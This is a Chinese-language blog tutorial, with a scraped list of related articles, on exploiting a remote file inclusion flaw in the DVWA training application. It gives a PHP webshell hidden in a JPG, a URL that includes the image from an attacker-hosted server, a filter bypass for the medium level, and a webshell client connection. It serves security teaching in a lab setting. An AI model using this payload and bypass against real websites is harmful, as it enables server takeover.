36、远程文件包含漏洞

简介: 36、远程文件包含漏洞

环境:DVWA,low级别

1、制作一句话图片,放到一台服务器上,该服务器ip:192.168.152.128

将yc.jpg照片拖入edjpgcom软件,添加下面这句话

<?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?>

0a2653c851af460fa595bd959398a8f1.png

2、访问一下该图片:http://192.168.152.128/yc.jpg

0eacb84100b54626af849e6b562bf92a.png

3、选择文件包含页面

2d65d23f6d4748949b924e4057485923.png

4、执行远程文件包含并生成后门

http://192.168.152.188/dvwa/vulnerabilities/fi/?page=http://192.168.152.128/yc.jpg

2e9b90b2ca334476abebe75bafe6eeaa.png

5、在/var/www/dvwa/vulnerabilities/fi目录生成了1.php

0a2653c851af460fa595bd959398a8f1.png

6、菜刀链接

0eacb84100b54626af849e6b562bf92a.png2d65d23f6d4748949b924e4057485923.png

二、环境:DVWA,medium级别

前三步和low级别一样

我们查看一下源码,发现屏蔽了http://和https://

4、执行远程文件包含并生成后门

http://192.168.152.188/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.152.128/yc.jpg

0a2653c851af460fa595bd959398a8f1.png

成功绕过

禁止非法,后果自负

目录
相关文章
|
6月前
|
安全 PHP
36、远程文件包含漏洞
36、远程文件包含漏洞
38 0
|
1月前
|
安全 前端开发 Linux
文件包含漏洞
文件包含漏洞
|
1月前
|
安全 PHP
文件包含漏洞(一)代码解读
文件包含漏洞(一)代码解读
|
6月前
|
安全 关系型数据库 MySQL
文件包含漏洞利用技术总结
文章讨论了PHP文件包含漏洞及其利用方法,包括远程文件包含、目录遍历和特殊协议利用等安全风险。
72 0
文件包含漏洞利用技术总结
|
Web App开发 XML 安全
DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
DedeCMS存在文件包含漏洞导致后台getshell,攻击者可通过该漏洞获取目标服务器控制权限,进行深度利用。
531 1
|
安全 网络安全 开发者
DedeCMS 5.7.106版本存在文件包含漏洞
攻击者可以通过操纵参数allurls来实现代码注入,并最终获得网站的控制权限。在/data/admin/allowurl.txt文件中写入的内容,并没有经过安全过滤,从而导致被成功绕过。由此可见,开发者应该严格限制用户输入的数据,避免类似漏洞的出现,确保网站的安全性和稳定性。
182 0
|
存储 安全 Unix
通用漏洞之文件包含漏洞
通用漏洞之文件包含漏洞
242 0
|
安全 关系型数据库 MySQL
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
360 0
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞